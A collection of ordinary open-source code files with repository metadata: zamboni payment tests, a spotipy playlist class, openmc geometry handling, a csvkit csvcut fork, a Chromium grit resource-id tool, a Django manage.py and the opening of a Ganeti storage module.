assert not AddonPaymentAccount.objects.exists()
def test_cancel_shared(self):
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo',
solitude_seller=self.seller, shared=True)
addon = Addon.objects.get()
AddonPaymentAccount.objects.create(
addon=addon, account_uri='foo',
payment_account=res, product_uri='bpruri')
with self.assertRaises(CantCancel):
res.cancel()
def test_get_details(self):
package = Mock()
package.get.return_value = {'full': {'vendorName': 'a',
'some_other_value': 'b'}}
self.bango_patcher.package.return_value = package
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='/foo/bar/123',
solitude_seller=self.seller)
deets = res.get_provider().account_retrieve(res)
eq_(deets['account_name'], res.name)
eq_(deets['vendorName'], 'a')
assert 'some_other_value' not in deets
self.bango_patcher.package.assert_called_with('123')
package.get.assert_called_with(data={'full': True})
def test_update_account_details(self):
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo',
solitude_seller=self.seller)
res.get_provider().account_update(res, {
'account_name': 'new name',
'vendorName': 'new vendor name',
'something_other_value': 'not a package key'
})
eq_(res.name, 'new name')
self.bango_patcher.api.by_url(res.uri).patch.assert_called_with(
data={'vendorName': 'new vendor name'})
|
{
"content_hash": "223aaa7322876d2f9f57f3b13602c8c1",
"timestamp": "",
"source": "github",
"line_count": 180,
"max_line_length": 77,
"avg_line_length": 35.65,
"alnum_prop": 0.6083839800529842,
"repo_name": "wagnerand/zamboni",
"id": "503566f776df3e78911374cc8ca96df3aa2ec6b1",
"size": "6417",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "mkt/developers/tests/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4145"
},
{
"name": "CSS",
"bytes": "884290"
},
{
"name": "JavaScript",
"bytes": "1677558"
},
{
"name": "Puppet",
"bytes": "13808"
},
{
"name": "Python",
"bytes": "6284101"
},
{
"name": "Shell",
"bytes": "19774"
}
],
"symlink_target": ""
}
|
import spotipy.core.baseplaylist
import spotify
class SpotifyPlayList(spotipy.core.baseplaylist.BasePlayList):
def __init__(self, wrapper, pl, name = None):
spotipy.core.baseplaylist.BasePlayList.__init__(self, wrapper)
self.__spotify_playlist = pl
self.__name = name
self.__listed = None
    def get_name(self):
        if self.__name is not None:
            return self.__name
        else:
            return self.__spotify_playlist.name()
    def get_tracks(self):
        if self.__listed is None:
            self.__listed = []
            if self.__spotify_playlist is not None:
if self.__spotify_playlist.type() == "playlist":
for i, t in enumerate(self.__spotify_playlist):
af = self.get_wrapper().create_audio_file(t)
af.set_tracknumber(i + 1)
af.set_index(af.get_tracknumber())
self.__listed.append(af)
#yield af
else:
for x in self.get_child_lists():
#for t in x.get_tracks():
# yield t
self.__listed.extend(x.get_tracks())
return self.__listed
|
{
"content_hash": "fcada63140b824870c267d26340e1f8c",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 70,
"avg_line_length": 38.27272727272727,
"alnum_prop": 0.49406175771971494,
"repo_name": "ZenHarbinger/spotipy",
"id": "dad481be01cc142fbed2a59dbab63540b373f70f",
"size": "1288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spotipy/backends/spotify/spotifyplaylist.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2140"
},
{
"name": "JavaScript",
"bytes": "3735"
},
{
"name": "Python",
"bytes": "142376"
}
],
"symlink_target": ""
}
|
from transmute_core.function.signature import Argument, NoDefault
from transmute_core.http_parameters import get_swagger_parameters
from transmute_core import default_context
from transmute_core.http_parameters import Parameters, Param, ParamSet
def test_swagger_parameters():
parameters = Parameters(
query=ParamSet(
{
"query": Param(
argument_name="query", arginfo=Argument("query", None, int)
)
}
),
body=ParamSet(
{
"left": Param(
argument_name="left", arginfo=Argument("left", NoDefault, int)
),
"right": Param(
argument_name="right", arginfo=Argument("right", 2, int)
),
}
),
header=ParamSet(
{
"header": Param(
argument_name="header", arginfo=Argument("header", NoDefault, int)
)
}
),
path=ParamSet(
{
"path": Param(
argument_name="path", arginfo=Argument("path", NoDefault, int)
)
}
),
)
params = get_swagger_parameters(parameters, default_context)
params = [p.to_primitive() for p in params]
assert {
"in": "query",
"name": "query",
"required": False,
"type": "integer",
"collectionFormat": "multi",
"description": "",
} in params
assert {
"in": "body",
"name": "body",
"schema": {
"type": "object",
"required": ["left"],
"properties": {
"left": {"type": "integer", "description": ""},
"right": {"type": "integer", "description": ""},
},
},
"required": True,
"description": "",
} in params
assert {
"in": "header",
"name": "header",
"type": "integer",
"required": True,
"description": "",
} in params
assert {
"in": "path",
"name": "path",
"type": "integer",
"required": True,
"description": "",
} in params
|
{
"content_hash": "a204355fa90c48fcc7047e638840dbb6",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 86,
"avg_line_length": 28.756410256410255,
"alnum_prop": 0.4551939366919304,
"repo_name": "toumorokoshi/web-transmute",
"id": "5cdd81378e76f8b57b9da29dc5f96ba5f555423a",
"size": "2243",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "transmute_core/tests/swagger/test_function.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21259"
}
],
"symlink_target": ""
}
|
from collections import OrderedDict, defaultdict
from collections.abc import Iterable
from copy import deepcopy
from pathlib import Path
from xml.etree import ElementTree as ET
import openmc
import openmc._xml as xml
from .checkvalue import check_type
class Geometry:
"""Geometry representing a collection of surfaces, cells, and universes.
Parameters
----------
root : openmc.UniverseBase or Iterable of openmc.Cell, optional
Root universe which contains all others, or an iterable of cells that
should be used to create a root universe.
Attributes
----------
root_universe : openmc.UniverseBase
Root universe which contains all others
bounding_box : 2-tuple of numpy.array
Lower-left and upper-right coordinates of an axis-aligned bounding box
of the universe.
"""
def __init__(self, root=None):
self._root_universe = None
self._offsets = {}
if root is not None:
if isinstance(root, openmc.UniverseBase):
self.root_universe = root
else:
univ = openmc.Universe()
for cell in root:
univ.add_cell(cell)
self._root_universe = univ
@property
def root_universe(self):
return self._root_universe
@property
def bounding_box(self):
return self.root_universe.bounding_box
@root_universe.setter
def root_universe(self, root_universe):
check_type('root universe', root_universe, openmc.UniverseBase)
self._root_universe = root_universe
def add_volume_information(self, volume_calc):
"""Add volume information from a stochastic volume calculation.
Parameters
----------
volume_calc : openmc.VolumeCalculation
Results from a stochastic volume calculation
"""
if volume_calc.domain_type == 'cell':
for cell in self.get_all_cells().values():
if cell.id in volume_calc.volumes:
cell.add_volume_information(volume_calc)
elif volume_calc.domain_type == 'material':
for material in self.get_all_materials().values():
if material.id in volume_calc.volumes:
material.add_volume_information(volume_calc)
elif volume_calc.domain_type == 'universe':
for universe in self.get_all_universes().values():
if universe.id in volume_calc.volumes:
universe.add_volume_information(volume_calc)
def export_to_xml(self, path='geometry.xml', remove_surfs=False):
"""Export geometry to an XML file.
Parameters
----------
path : str
Path to file to write. Defaults to 'geometry.xml'.
remove_surfs : bool
Whether or not to remove redundant surfaces from the geometry when
exporting
.. versionadded:: 0.12
"""
# Find and remove redundant surfaces from the geometry
if remove_surfs:
self.remove_redundant_surfaces()
# Create XML representation
root_element = ET.Element("geometry")
self.root_universe.create_xml_subelement(root_element, memo=set())
# Sort the elements in the file
root_element[:] = sorted(root_element, key=lambda x: (
x.tag, int(x.get('id'))))
# Clean the indentation in the file to be user-readable
xml.clean_indentation(root_element)
# Check if path is a directory
p = Path(path)
if p.is_dir():
p /= 'geometry.xml'
# Write the XML Tree to the geometry.xml file
xml.reorder_attributes(root_element) # TODO: Remove when support is Python 3.8+
tree = ET.ElementTree(root_element)
tree.write(str(p), xml_declaration=True, encoding='utf-8')
@classmethod
def from_xml(cls, path='geometry.xml', materials=None):
"""Generate geometry from XML file
Parameters
----------
path : str, optional
Path to geometry XML file
materials : openmc.Materials or None
Materials used to assign to cells. If None, an attempt is made to
generate it from the materials.xml file.
Returns
-------
openmc.Geometry
Geometry object
"""
# Helper function for keeping a cache of Universe instances
universes = {}
def get_universe(univ_id):
if univ_id not in universes:
univ = openmc.Universe(univ_id)
universes[univ_id] = univ
return universes[univ_id]
tree = ET.parse(path)
root = tree.getroot()
# Get surfaces
surfaces = {}
periodic = {}
for surface in root.findall('surface'):
s = openmc.Surface.from_xml_element(surface)
surfaces[s.id] = s
# Check for periodic surface
other_id = xml.get_text(surface, 'periodic_surface_id')
if other_id is not None:
periodic[s.id] = int(other_id)
# Apply periodic surfaces
for s1, s2 in periodic.items():
surfaces[s1].periodic_surface = surfaces[s2]
# Add any DAGMC universes
for elem in root.findall('dagmc_universe'):
dag_univ = openmc.DAGMCUniverse.from_xml_element(elem)
universes[dag_univ.id] = dag_univ
# Dictionary that maps each universe to a list of cells/lattices that
# contain it (needed to determine which universe is the root)
child_of = defaultdict(list)
for elem in root.findall('lattice'):
lat = openmc.RectLattice.from_xml_element(elem, get_universe)
universes[lat.id] = lat
if lat.outer is not None:
child_of[lat.outer].append(lat)
for u in lat.universes.ravel():
child_of[u].append(lat)
for elem in root.findall('hex_lattice'):
lat = openmc.HexLattice.from_xml_element(elem, get_universe)
universes[lat.id] = lat
if lat.outer is not None:
child_of[lat.outer].append(lat)
if lat.ndim == 2:
for ring in lat.universes:
for u in ring:
child_of[u].append(lat)
else:
for axial_slice in lat.universes:
for ring in axial_slice:
for u in ring:
child_of[u].append(lat)
# Create dictionary to easily look up materials
if materials is None:
filename = Path(path).parent / 'materials.xml'
materials = openmc.Materials.from_xml(str(filename))
mats = {str(m.id): m for m in materials}
mats['void'] = None
for elem in root.findall('cell'):
c = openmc.Cell.from_xml_element(elem, surfaces, mats, get_universe)
if c.fill_type in ('universe', 'lattice'):
child_of[c.fill].append(c)
# Determine which universe is the root by finding one which is not a
# child of any other object
for u in universes.values():
if not child_of[u]:
return cls(u)
else:
raise ValueError('Error determining root universe.')
def find(self, point):
"""Find cells/universes/lattices which contain a given point
Parameters
----------
point : 3-tuple of float
Cartesian coordinates of the point
Returns
-------
list
Sequence of universes, cells, and lattices which are traversed to
find the given point
"""
return self.root_universe.find(point)
def get_instances(self, paths):
"""Return the instance number(s) for a cell/material in a geometry path.
The instance numbers are used as indices into distributed
material/temperature arrays and tally distribcell filter arrays.
Parameters
----------
paths : str or iterable of str
The path traversed through the CSG tree to reach a cell or material
instance. For example, 'u0->c10->l20(2,2,1)->u5->c5' would indicate
the cell instance whose first level is universe 0 and cell 10,
second level is lattice 20 position (2,2,1), and third level is
universe 5 and cell 5.
Returns
-------
int or list of int
Instance number(s) for the given path(s)
"""
# Make sure we are working with an iterable
return_list = (isinstance(paths, Iterable) and
not isinstance(paths, str))
path_list = paths if return_list else [paths]
indices = []
for p in path_list:
# Extract the cell id from the path
last_index = p.rfind('>')
last_path = p[last_index+1:]
uid = int(last_path[1:])
# Get corresponding cell/material
if last_path[0] == 'c':
obj = self.get_all_cells()[uid]
elif last_path[0] == 'm':
obj = self.get_all_materials()[uid]
# Determine index in paths array
try:
indices.append(obj.paths.index(p))
except ValueError:
indices.append(None)
return indices if return_list else indices[0]
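    # Illustrative sketch (hypothetical IDs, not part of the original class):
    # after calling geometry.determine_paths(), a query such as
    #   geometry.get_instances('u0->c10->l20(2,2,1)->u5->c5')
    # returns the index of that path in cell 5's `paths` list, or None if the
    # path is not found.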
def get_all_cells(self):
"""Return all cells in the geometry.
Returns
-------
collections.OrderedDict
Dictionary mapping cell IDs to :class:`openmc.Cell` instances
"""
if self.root_universe is not None:
return self.root_universe.get_all_cells(memo=set())
else:
return OrderedDict()
def get_all_universes(self):
"""Return all universes in the geometry.
Returns
-------
collections.OrderedDict
Dictionary mapping universe IDs to :class:`openmc.Universe`
instances
"""
universes = OrderedDict()
universes[self.root_universe.id] = self.root_universe
universes.update(self.root_universe.get_all_universes())
return universes
def get_all_materials(self):
"""Return all materials within the geometry.
Returns
-------
collections.OrderedDict
Dictionary mapping material IDs to :class:`openmc.Material`
instances
"""
if self.root_universe is not None:
return self.root_universe.get_all_materials(memo=set())
else:
return OrderedDict()
def get_all_material_cells(self):
"""Return all cells filled by a material
Returns
-------
collections.OrderedDict
Dictionary mapping cell IDs to :class:`openmc.Cell` instances that
are filled with materials or distributed materials.
"""
material_cells = OrderedDict()
for cell in self.get_all_cells().values():
if cell.fill_type in ('material', 'distribmat'):
if cell not in material_cells:
material_cells[cell.id] = cell
return material_cells
def get_all_material_universes(self):
"""Return all universes having at least one material-filled cell.
This method can be used to find universes that have at least one cell
that is filled with a material or is void.
Returns
-------
collections.OrderedDict
Dictionary mapping universe IDs to :class:`openmc.Universe`
instances with at least one material-filled cell
"""
material_universes = OrderedDict()
for universe in self.get_all_universes().values():
for cell in universe.cells.values():
if cell.fill_type in ('material', 'distribmat', 'void'):
if universe not in material_universes:
material_universes[universe.id] = universe
return material_universes
def get_all_lattices(self):
"""Return all lattices defined
Returns
-------
collections.OrderedDict
Dictionary mapping lattice IDs to :class:`openmc.Lattice` instances
"""
lattices = OrderedDict()
for cell in self.get_all_cells().values():
if cell.fill_type == 'lattice':
if cell.fill.id not in lattices:
lattices[cell.fill.id] = cell.fill
return lattices
def get_all_surfaces(self):
"""
Return all surfaces used in the geometry
Returns
-------
collections.OrderedDict
Dictionary mapping surface IDs to :class:`openmc.Surface` instances
"""
surfaces = OrderedDict()
for cell in self.get_all_cells().values():
if cell.region is not None:
surfaces = cell.region.get_surfaces(surfaces)
return surfaces
def get_redundant_surfaces(self):
"""Return all of the topologically redundant surface IDs
.. versionadded:: 0.12
Returns
-------
dict
Dictionary whose keys are the ID of a redundant surface and whose
values are the topologically equivalent :class:`openmc.Surface`
that should replace it.
"""
tally = defaultdict(list)
for surf in self.get_all_surfaces().values():
coeffs = tuple(surf._coefficients[k] for k in surf._coeff_keys)
key = (surf._type,) + coeffs
tally[key].append(surf)
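        # Keep the first surface recorded for each (type, coefficients) key and
        # map the ID of every later duplicate to that retained surface.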
return {replace.id: keep
for keep, *redundant in tally.values()
for replace in redundant}
def _get_domains_by_name(self, name, case_sensitive, matching, domain_type):
if not case_sensitive:
name = name.lower()
domains = []
func = getattr(self, f'get_all_{domain_type}s')
for domain in func().values():
domain_name = domain.name if case_sensitive else domain.name.lower()
if domain_name == name:
domains.append(domain)
elif not matching and name in domain_name:
domains.append(domain)
domains.sort(key=lambda x: x.id)
return domains
def get_materials_by_name(self, name, case_sensitive=False, matching=False):
"""Return a list of materials with matching names.
Parameters
----------
name : str
The name to match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
material's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Material
Materials matching the queried name
"""
return self._get_domains_by_name(name, case_sensitive, matching, 'material')
def get_cells_by_name(self, name, case_sensitive=False, matching=False):
"""Return a list of cells with matching names.
Parameters
----------
name : str
            The name to match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
cell's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Cell
Cells matching the queried name
"""
return self._get_domains_by_name(name, case_sensitive, matching, 'cell')
def get_cells_by_fill_name(self, name, case_sensitive=False, matching=False):
"""Return a list of cells with fills with matching names.
Parameters
----------
name : str
The name to match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
cell's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Cell
Cells with fills matching the queried name
"""
if not case_sensitive:
name = name.lower()
cells = set()
for cell in self.get_all_cells().values():
names = []
if cell.fill_type in ('material', 'universe', 'lattice'):
names.append(cell.fill.name)
elif cell.fill_type == 'distribmat':
for mat in cell.fill:
if mat is not None:
names.append(mat.name)
for fill_name in names:
if not case_sensitive:
fill_name = fill_name.lower()
if fill_name == name:
cells.add(cell)
elif not matching and name in fill_name:
cells.add(cell)
return sorted(cells, key=lambda x: x.id)
def get_universes_by_name(self, name, case_sensitive=False, matching=False):
"""Return a list of universes with matching names.
Parameters
----------
name : str
The name to match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
universe's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Universe
Universes matching the queried name
"""
return self._get_domains_by_name(name, case_sensitive, matching, 'universe')
def get_lattices_by_name(self, name, case_sensitive=False, matching=False):
"""Return a list of lattices with matching names.
Parameters
----------
name : str
The name to match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
lattice's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Lattice
Lattices matching the queried name
"""
return self._get_domains_by_name(name, case_sensitive, matching, 'lattice')
def remove_redundant_surfaces(self):
"""Remove redundant surfaces from the geometry"""
# Get redundant surfaces
redundant_surfaces = self.get_redundant_surfaces()
# Iterate through all cells contained in the geometry
for cell in self.get_all_cells().values():
# Recursively remove redundant surfaces from regions
if cell.region:
cell.region.remove_redundant_surfaces(redundant_surfaces)
def determine_paths(self, instances_only=False):
"""Determine paths through CSG tree for cells and materials.
This method recursively traverses the CSG tree to determine each unique
path that reaches every cell and material. The paths are stored in the
:attr:`Cell.paths` and :attr:`Material.paths` attributes.
Parameters
----------
instances_only : bool, optional
If true, this method will only determine the number of instances of
each cell and material.
"""
# (Re-)initialize all cell instances to 0
for cell in self.get_all_cells().values():
cell._paths = []
cell._num_instances = 0
for material in self.get_all_materials().values():
material._paths = []
material._num_instances = 0
# Recursively traverse the CSG tree to count all cell instances
self.root_universe._determine_paths(instances_only=instances_only)
def clone(self):
"""Create a copy of this geometry with new unique IDs for all of its
enclosed materials, surfaces, cells, universes and lattices."""
clone = deepcopy(self)
clone.root_universe = self.root_universe.clone()
return clone
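# Illustrative usage sketch (not part of the original module); the surface and
# cell constructors below come from the wider openmc API, and fuel_material is
# a placeholder:
#
#   sphere = openmc.Sphere(r=10.0, boundary_type='vacuum')
#   cell = openmc.Cell(region=-sphere, fill=fuel_material)
#   geometry = Geometry([cell])            # root universe built from the cell list
#   geometry.export_to_xml('geometry.xml')
#   restored = Geometry.from_xml('geometry.xml')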
|
{
"content_hash": "dc6b08c04dc43d0e6cd33d3f938c232f",
"timestamp": "",
"source": "github",
"line_count": 610,
"max_line_length": 88,
"avg_line_length": 33.368852459016395,
"alnum_prop": 0.5753868828297716,
"repo_name": "amandalund/openmc",
"id": "58a33c1b1217427ac7aa311e216787f77d9eab88",
"size": "20355",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "openmc/geometry.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "8552"
},
{
"name": "C++",
"bytes": "1273951"
},
{
"name": "CMake",
"bytes": "27805"
},
{
"name": "Dockerfile",
"bytes": "1427"
},
{
"name": "Python",
"bytes": "2603788"
},
{
"name": "Shell",
"bytes": "2519"
}
],
"symlink_target": ""
}
|
"""
csvcut is originally the work of eminent hackers Joe Germuska and Aaron Bycoffe.
This code is forked from:
https://gist.github.com/561347/9846ebf8d0a69b06681da9255ffe3d3f59ec2c97
Used and modified with permission.
"""
import itertools
from csvkit import CSVKitReader, CSVKitWriter
from csvkit.cli import CSVKitUtility, parse_column_identifiers
from csvkit.headers import make_default_headers
from ColumnSelectorMixin import ColumnSelectorMixin
class CSVCut(CSVKitUtility,ColumnSelectorMixin):
description = 'Filter and truncate CSV files. Like unix "cut" command, but for tabular data.'
def add_arguments(self):
self.argparser.add_argument('-n', '--names', dest='names_only', action='store_true',
help='Display column names and indices from the input CSV and exit.')
self.argparser.add_argument('-c', '--columns', dest='columns',
help='A comma separated list of column indices or names to be extracted. Defaults to all columns.')
self.argparser.add_argument('-C', '--not-columns', dest='not_columns',
help='A comma separated list of column indices or names to be excluded. Defaults to no columns.')
self.argparser.add_argument('-x', '--delete-empty-rows', dest='delete_empty', action='store_true',
help='After cutting, delete rows which are completely empty.')
ColumnSelectorMixin.add_arguments(self)
def main(self):
if self.args.names_only:
self.print_column_names()
return
rows = CSVKitReader(self.input_file, **self.reader_kwargs)
if self.args.no_header_row:
row = next(rows)
column_names = make_default_headers(len(row))
# Put the row back on top
rows = itertools.chain([row], rows)
else:
column_names = next(rows)
column_ids = parse_column_identifiers(self.args.columns, column_names, self.args.zero_based, self.args.not_columns)
column_ids = self.parse_regex_column(self.args.regex_column,column_ids,column_names)
column_ids = self.parse_not_regex_column(self.args.not_regex_column,column_ids,column_names)
column_ids = self.parse_column_contains(self.args.column_contains,column_ids,column_names)
column_ids = self.parse_not_column_contains(self.args.not_column_contains,column_ids,column_names)
output = CSVKitWriter(self.output_file, **self.writer_kwargs)
output.writerow([column_names[c] for c in column_ids])
for row in rows:
out_row = [row[c] if c < len(row) else None for c in column_ids]
if self.args.delete_empty:
                if ''.join(v for v in out_row if v is not None) == '':
continue
output.writerow(out_row)
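# Illustrative command-line sketch (assumes this utility is installed as the
# standard csvkit ``csvcut`` entry point and takes the usual positional input
# file; neither is shown in this fork's source):
#
#   csvcut -n data.csv            # list column names and indices, then exit
#   csvcut -c 1,3 data.csv        # keep only columns 1 and 3
#   csvcut -C name -x data.csv    # drop the "name" column and delete empty rows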
def launch_new_instance():
utility = CSVCut()
utility.main()
if __name__ == "__main__":
launch_new_instance()
|
{
"content_hash": "0d004a56945500a7b476da227c02a0b9",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 123,
"avg_line_length": 39.56164383561644,
"alnum_prop": 0.6648199445983379,
"repo_name": "unpingco/csvkit",
"id": "1795d8de7b56661bcee1bbe6de14ded7aefc715f",
"size": "2911",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "csvkit/utilities/csvcut.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "256278"
}
],
"symlink_target": ""
}
|
"""
A tool to generate a predetermined resource ids file that can be used as an
input to grit via the -p option. This is meant to be run manually every once in
a while and its output checked in. See tools/gritsettings/README.md for details.
"""
from __future__ import print_function
import os
import re
import sys
# Regular expression for parsing the #define macro format. Matches both the
# version of the macro with whitelist support and the one without. For example,
# Without generate whitelist flag:
# #define IDS_FOO_MESSAGE 1234
# With generate whitelist flag:
# #define IDS_FOO_MESSAGE (::ui::WhitelistedResource<1234>(), 1234)
RESOURCE_EXTRACT_REGEX = re.compile(r'^#define (\S*).* (\d+)\)?$', re.MULTILINE)
ORDERED_RESOURCE_IDS_REGEX = re.compile(r'^Resource=(\d*)$', re.MULTILINE)
def _GetResourceNameIdPairsIter(string_to_scan):
"""Gets an iterator of the resource name and id pairs of the given string.
Scans the input string for lines of the form "#define NAME ID" and returns
an iterator over all matching (NAME, ID) pairs.
Args:
string_to_scan: The input string to scan.
Yields:
A tuple of name and id.
"""
for match in RESOURCE_EXTRACT_REGEX.finditer(string_to_scan):
yield match.group(1, 2)
def _ReadOrderedResourceIds(path):
"""Reads ordered resource ids from the given file.
The resources are expected to be of the format produced by running Chrome
  with the --print-resource-ids command-line flag.
Args:
path: File path to read resource ids from.
Returns:
An array of ordered resource ids.
"""
ordered_resource_ids = []
with open(path, "r") as f:
for match in ORDERED_RESOURCE_IDS_REGEX.finditer(f.read()):
ordered_resource_ids.append(int(match.group(1)))
return ordered_resource_ids
def GenerateResourceMapping(original_resources, ordered_resource_ids):
"""Generates a resource mapping from the ordered ids and the original mapping.
The returned dict will assign new ids to ordered_resource_ids numerically
increasing from 101.
Args:
original_resources: A dict of original resource ids to resource names.
ordered_resource_ids: An array of ordered resource ids.
Returns:
A dict of resource ids to resource names.
"""
output_resource_map = {}
# 101 is used as the starting value since other parts of GRIT require it to be
# the minimum (e.g. rc_header.py) based on Windows resource numbering.
next_id = 101
for original_id in ordered_resource_ids:
resource_name = original_resources[original_id]
output_resource_map[next_id] = resource_name
next_id += 1
return output_resource_map
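# Illustrative example (not in the original file): given
#   original_resources   = {5000: 'IDS_FOO', 5001: 'IDS_BAR'}
#   ordered_resource_ids = [5001, 5000]
# GenerateResourceMapping returns {101: 'IDS_BAR', 102: 'IDS_FOO'}, i.e. new ids
# are handed out from 101 in the given order.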
def ReadResourceIdsFromFile(file, original_resources):
"""Reads resource ids from a GRIT-produced header file.
Args:
file: File to a GRIT-produced header file to read from.
original_resources: Dict of resource ids to resource names to add to.
"""
for resource_name, resource_id in _GetResourceNameIdPairsIter(file.read()):
original_resources[int(resource_id)] = resource_name
def _ReadOriginalResourceIds(out_dir):
"""Reads resource ids from GRIT header files in the specified directory.
Args:
out_dir: A Chrome build output directory (e.g. out/gn) to scan.
Returns:
A dict of resource ids to resource names.
"""
original_resources = {}
for root, dirnames, filenames in os.walk(out_dir + '/gen'):
for filename in filenames:
if filename.endswith(('_resources.h', '_settings.h', '_strings.h')):
with open(os.path.join(root, filename), "r") as f:
ReadResourceIdsFromFile(f, original_resources)
return original_resources
def _GeneratePredeterminedIdsFile(ordered_resources_file, out_dir):
"""Generates a predetermined ids file.
Args:
ordered_resources_file: File path to read ordered resource ids from.
out_dir: A Chrome build output directory (e.g. out/gn) to scan.
Returns:
A dict of resource ids to resource names.
"""
original_resources = _ReadOriginalResourceIds(out_dir)
ordered_resource_ids = _ReadOrderedResourceIds(ordered_resources_file)
output_resource_map = GenerateResourceMapping(original_resources,
ordered_resource_ids)
for res_id in sorted(output_resource_map.keys()):
print(output_resource_map[res_id], res_id)
def main(argv):
if len(argv) != 2:
print("usage: gen_predetermined_ids.py <ordered_resources_file> <out_dir>")
sys.exit(1)
ordered_resources_file, out_dir = argv[0], argv[1]
_GeneratePredeterminedIdsFile(ordered_resources_file, out_dir)
if '__main__' == __name__:
main(sys.argv[1:])
|
{
"content_hash": "72ae91c11efb659afd9664671fa165ef",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 80,
"avg_line_length": 33.18705035971223,
"alnum_prop": 0.7129850422718405,
"repo_name": "endlessm/chromium-browser",
"id": "9b2aa7b1a578155b5af5ddc650d4a54e8f8500e3",
"size": "4798",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tools/grit/grit/format/gen_predetermined_ids.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import os
import sys
from django import http
from django.conf.urls import url
import app.views
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "personRegister.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
def index(request):
    return http.HttpResponse("Hello world!")
|
{
"content_hash": "bdcb0140b956461dbe982e0a30bb7d38",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 78,
"avg_line_length": 25.785714285714285,
"alnum_prop": 0.7340720221606648,
"repo_name": "aprendist-repo/test",
"id": "35aa3ad434f673c97308fef3607e98593fe4dbba",
"size": "383",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24237"
},
{
"name": "HTML",
"bytes": "13443"
},
{
"name": "JavaScript",
"bytes": "15951"
},
{
"name": "Python",
"bytes": "4763"
}
],
"symlink_target": ""
}
|
"""Logical units dealing with storage of instances."""
import itertools
import logging
import os
import time
from ganeti import compat
from ganeti import constants
from ganeti import errors
from ganeti import ht
from ganeti import locking
from ganeti.masterd import iallocator
from ganeti import objects
from ganeti import utils
import ganeti.rpc.node as rpc
from ganeti.cmdlib.base import LogicalUnit, NoHooksLU, Tasklet
from ganeti.cmdlib.common import INSTANCE_DOWN, INSTANCE_NOT_RUNNING, \
AnnotateDiskParams, CheckIAllocatorOrNode, ExpandNodeUuidAndName, \
ComputeIPolicyDiskSizesViolation, \
CheckNodeOnline, CheckInstanceNodeGroups, CheckInstanceState, \
IsExclusiveStorageEnabledNode, FindFaultyInstanceDisks, GetWantedNodes, \
CheckDiskTemplateEnabled
from ganeti.cmdlib.instance_utils import GetInstanceInfoText, \
CopyLockList, ReleaseLocks, CheckNodeVmCapable, \
BuildInstanceHookEnvByObject, CheckNodeNotDrained, CheckTargetNodeIPolicy
import ganeti.masterd.instance
_DISK_TEMPLATE_NAME_PREFIX = {
constants.DT_PLAIN: "",
constants.DT_RBD: ".rbd",
constants.DT_EXT: ".ext",
constants.DT_FILE: ".file",
constants.DT_SHARED_FILE: ".sharedfile",
}
def CreateSingleBlockDev(lu, node_uuid, instance, device, info, force_open,
excl_stor):
"""Create a single block device on a given node.
This will not recurse over children of the device, so they must be
created in advance.
@param lu: the lu on whose behalf we execute
@param node_uuid: the node on which to create the device
@type instance: L{objects.Instance}
@param instance: the instance which owns the device
@type device: L{objects.Disk}
@param device: the device to create
@param info: the extra 'metadata' we should attach to the device
(this will be represented as a LVM tag)
@type force_open: boolean
  @param force_open: this parameter will be passed to the
      L{backend.BlockdevCreate} function where it specifies
      whether we run on primary or not, and it affects both
      the child assembly and the device's own Open() execution
@type excl_stor: boolean
@param excl_stor: Whether exclusive_storage is active for the node
"""
result = lu.rpc.call_blockdev_create(node_uuid, (device, instance),
device.size, instance.name, force_open,
info, excl_stor)
result.Raise("Can't create block device %s on"
" node %s for instance %s" % (device,
lu.cfg.GetNodeName(node_uuid),
instance.name))
def _CreateBlockDevInner(lu, node_uuid, instance, device, force_create,
info, force_open, excl_stor):
"""Create a tree of block devices on a given node.
If this device type has to be created on secondaries, create it and
all its children.
If not, just recurse to children keeping the same 'force' value.
@attention: The device has to be annotated already.
@param lu: the lu on whose behalf we execute
@param node_uuid: the node on which to create the device
@type instance: L{objects.Instance}
@param instance: the instance which owns the device
@type device: L{objects.Disk}
@param device: the device to create
@type force_create: boolean
@param force_create: whether to force creation of this device; this
      will be changed to True whenever we find a device which has the
      CreateOnSecondary() attribute
@param info: the extra 'metadata' we should attach to the device
(this will be represented as a LVM tag)
@type force_open: boolean
  @param force_open: this parameter will be passed to the
      L{backend.BlockdevCreate} function where it specifies
      whether we run on primary or not, and it affects both
      the child assembly and the device's own Open() execution
@type excl_stor: boolean
@param excl_stor: Whether exclusive_storage is active for the node
@return: list of created devices
"""
